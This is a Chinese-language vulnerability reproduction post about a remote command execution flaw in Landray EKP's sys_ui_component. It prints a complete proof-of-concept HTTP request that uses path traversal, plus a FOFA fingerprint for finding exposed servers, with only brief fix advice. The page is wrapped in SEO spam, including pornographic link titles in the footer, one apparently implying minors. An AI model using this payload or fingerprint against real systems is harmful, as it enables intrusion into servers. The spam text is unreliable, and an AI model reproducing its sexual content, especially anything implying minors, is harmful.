日韩欧美国产精品免费一二-日韩欧美国产精品亚洲二区-日韩欧美国产精品专区-日韩欧美国产另-日韩欧美国产免费看-日韩欧美国产免费看清风阁

LOGO OA教程 ERP教程 模切知識交流 PMS教程 CRM教程 開發文檔 其他文檔  
 
網站管理員

2024HW 藍凌 ekp sys_ui_component 遠程命令執行漏洞復現

admin
2024年8月22日 18:56 本文熱度 261
免責聲明

請勿利用文章內的相關技術從事非法測試,由于傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,作者不為此承擔任何責任。工具來自網絡,安全性自測,如有侵權請聯系刪除。



01
0x01漏洞描述
藍凌 EKP sys_ui_component 遠程命令執行漏洞,攻擊者可通過此漏洞上傳惡意腳本文件,對服務器的正常運行造成安全威脅。

02
0x02漏洞復現
POC如下所示:POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1Host:xx.xx.xx.xxAccept:application/json,text/javascript,*/*;q=0.01Accept-Encoding:gzip,deflateAccept-Language:zh-CN,zh;q=0.9,en;q=0.8Connection:closeContent-Type:multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/83.0.4103.116Safari/537.36X-Requested-With:XMLHttpRequestContent-Length: 395
------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="method"
replaceExtend------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="extendId"
../../../../resource/help/km/review/------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="folderName"
../../../ekp/sys/common------WebKitFormBoundaryL7ILSpOdIhIIvL51--
exp
后臺回復:"藍凌exp" 獲取

03
0x03 復現過程
fofa:icon_hash="831854882"

頁面是這個樣子的:


使用poc:

執行命令dir:


04
0x04?修復建議
1、請聯系廠商進行修復。2、如非必要,禁止公網訪問該系統。3、設置白名單訪問。


END

該文章在 2024/8/24 12:22:52 編輯過
關鍵字查詢
相關文章
正在查詢...
點晴ERP是一款針對中小制造業的專業生產管理軟件系統,系統成熟度和易用性得到了國內大量中小企業的青睞。
點晴PMS碼頭管理系統主要針對港口碼頭集裝箱與散貨日常運作、調度、堆場、車隊、財務費用、相關報表等業務管理,結合碼頭的業務特點,圍繞調度、堆場作業而開發的。集技術的先進性、管理的有效性于一體,是物流碼頭及其他港口類企業的高效ERP管理信息系統。
點晴WMS倉儲管理系統提供了貨物產品管理,銷售管理,采購管理,倉儲管理,倉庫管理,保質期管理,貨位管理,庫位管理,生產管理,WMS管理系統,標簽打印,條形碼,二維碼管理,批號管理軟件。
點晴免費OA是一款軟件和通用服務都免費,不限功能、不限時間、不限用戶的免費OA協同辦公管理系統。
Copyright 2010-2025 ClickSun All Rights Reserved

主站蜘蛛池模板: 国产精品区在 | 麻花传媒68xxx在线观看 | 欧美日韩一区观看 | 香港日本三级在线播放 | 91大神精品网 | 少女韩国在线观看完整版免费 | 丰满岳乱妇 | 国产精品美女视视频 | 精品夜恋影院亚洲欧洲 | 亚洲精品中文字 | 国产女人喷潮视频在线观看免费 | 国产精品yy | 久热中文字幕精品视 | 亚洲日本aⅴ片在线观看香蕉 | 国产女精 | 亚洲高清aⅴ日本欧美视频 欧美另类69 | 手机高清热播韩剧美剧电视剧 | 国产未成女一区二区 | 日韩主播大秀在 | 精品区一 | 日韩男女激情视频在线观看 | 国产精品亚洲网红主播 | 亚洲国产高清视 | 尤物视频在线免费观看 | 91精品啪aⅴ在线观看国产 | 911精品国产一区二区在线 | 国产91色在线中文电影 | 又刺激又爽又黄的视频在线观看 | 欧美日韩国产综合草草 | 国产福利免费的网址 | 国产98色在线 | 国产精品天天看特色大片 | 亚洲日韩精品欧美一区二区 | 日韩亚洲欧美高清在线观看 | 99精品在线视频 | 午夜理论片在线观看免费 | 真实国产乱子伦视频 | 亚洲人成电影网 | 国内精品视频九九九九 | 国语在线看免费观 | 国产精品毛多多水多 |